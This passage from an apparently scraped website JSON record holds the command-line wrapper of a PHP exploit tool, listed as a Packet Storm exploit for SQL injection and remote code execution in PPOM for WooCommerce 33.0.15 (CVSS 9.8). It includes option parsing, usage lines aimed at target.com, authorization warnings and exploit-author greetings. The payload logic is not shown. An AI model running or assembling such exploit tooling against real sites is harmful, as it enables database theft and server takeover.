-s 5\\” . PHP_EOL;\\n echo \\” php security_tester.php -u http:\/\/target.com -t rce -v\\” . PHP_EOL;\\n echo \\” php security_tester.php -u http:\/\/target.com -t all -o scan.log\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”\\\\033[1;31m\\” . \\”WARNING: For authorized penetration testing only!\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;31m\\” . \\”Legal use requires explicit permission from system owner.\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n exit(0);\\n }\\n \\n function main() {\\n $options = getopt(\\”u:t:s:m:vo:h\\”, array(\\”url:\\”, \\”type:\\”, \\”timeout:\\”, \\”method:\\”, \\”verbose\\”, \\”output:\\”, \\”help\\”));\\n \\n if (isset($options[‘h’]) || isset($options[‘help’])) {\\n show_help();\\n }\\n \\n \/\/ \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0627\u0644\u0642\u064a\u0645 \u0645\u0639 \u062f\u0639\u0645 PHP 5.x\\n $url = ”;\\n if (isset($options[‘u’])) {\\n $url = $options[‘u’];\\n } elseif (isset($options[‘url’])) {\\n $url = $options[‘url’];\\n }\\n \\n if (empty($url)) {\\n echo \\”\\\\033[1;31m\\” . \\”Error: Target URL is required!\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”Use –help for usage information.\\” . PHP_EOL;\\n exit(1);\\n }\\n \\n $attack_type = ‘all’;\\n if (isset($options[‘t’])) {\\n $attack_type = $options[‘t’];\\n } elseif (isset($options[‘type’])) {\\n $attack_type = $options[‘type’];\\n }\\n \\n $timeout = 7;\\n if (isset($options[‘s’])) {\\n $timeout = intval($options[‘s’]);\\n } elseif (isset($options[‘timeout’])) {\\n $timeout = intval($options[‘timeout’]);\\n }\\n \\n $method = ‘auto’;\\n if (isset($options[‘m’])) {\\n $method = $options[‘m’];\\n } elseif (isset($options[‘method’])) {\\n $method = $options[‘method’];\\n }\\n \\n $verbose = isset($options[‘v’]) || isset($options[‘verbose’]);\\n \\n $output_file = null;\\n if (isset($options[‘o’])) {\\n $output_file = $options[‘o’];\\n } elseif (isset($options[‘output’])) {\\n $output_file = $options[‘output’];\\n }\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u0645\u062f\u062e\u0644\u0627\u062a\\n if (!in_array($attack_type, array(‘sql’, ‘rce’, ‘all’))) {\\n echo \\”\\\\033[1;31m\\” . \\”Error: Type must be ‘sql’, ‘rce’, or ‘all’\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n exit(1);\\n }\\n \\n if ($timeout \\u003c 1 || $timeout \\u003e 30) {\\n echo \\”\\\\033[1;31m\\” . \\”Error: Timeout must be between 1 and 30 seconds\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n exit(1);\\n }\\n \\n if (!in_array($method, array(‘auto’, ‘curl’, ‘file’))) {\\n echo \\”\\\\033[1;31m\\” . \\”Error: Method must be ‘auto’, ‘curl’, or ‘file’\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n exit(1);\\n }\\n \\n \/\/ \u0625\u0636\u0627\u0641\u0629 http:\/\/ \u0625\u0630\u0627 \u0644\u0645 \u064a\u0643\u0646 \u0645\u0648\u062c\u0648\u062f\u064b\u0627\\n if (!preg_match(‘\/^https?:\\\\\/\\\\\/\/’, $url)) {\\n $url = ‘http:\/\/’ . $url;\\n }\\n \\n \/\/ \u0625\u0634\u0639\u0627\u0631 \u0623\u0645\u0646\u064a\\n echo \\”\\\\033[1;31m\\” . \\” SECURITY NOTICE:\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”This tool is for authorized security testing only.\\” . PHP_EOL;\\n echo \\”Unauthorized use is illegal and unethical.\\” . PHP_EOL;\\n echo \\”Proceed only if you have explicit permission.\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”Starting scan in 3 seconds…\\”;\\n for ($i = 3; $i \\u003e 0; $i–) {\\n echo \\” {$i}\\”;\\n sleep(1);\\n }\\n echo PHP_EOL . PHP_EOL;\\n \\n try {\\n $tester = new SecurityTesterCLI($url, $timeout, $attack_type, $verbose, $method, $output_file);\\n $tester-\\u003erun_complete_test();\\n } catch (Exception $e) {\\n echo \\”\\\\033[1;31m\\” . \\”Error: \\” . $e-\\u003egetMessage() . \\”\\\\033[0m\\” . PHP_EOL;\\n exit(1);\\n }\\n \\n exit(0);\\n }\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0625\u0635\u062f\u0627\u0631 PHP\\n if (version_compare(PHP_VERSION, ‘5.4.0’, ‘\\u003c’)) {\\n echo \\”\\\\033[1;31m\\” . \\”Error: PHP 5.4 or higher is required!\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”Current PHP version: \\” . PHP_VERSION . PHP_EOL;\\n exit(1);\\n }\\n \\n \/\/ \u0628\u062f\u0621 \u0627\u0644\u062a\u0634\u063a\u064a\u0644\\n if (PHP_SAPI === ‘cli’) {\\n main();\\n } else {\\n echo \\”\\\\033[1;31m\\” . \\”This script must be run from the command line.\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”Usage: php \\” . basename(__FILE__) . \\” –url \\u003ctarget_url\\u003e\\” . PHP_EOL;\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215642″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215642\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-16T17:45:10″,”description”:”This is an extensive exploit that leverages a remote SQL injection vulnerability in PPOM for WooCommerce version 33.0.15 to also achieve remote code execution and…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-41067","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n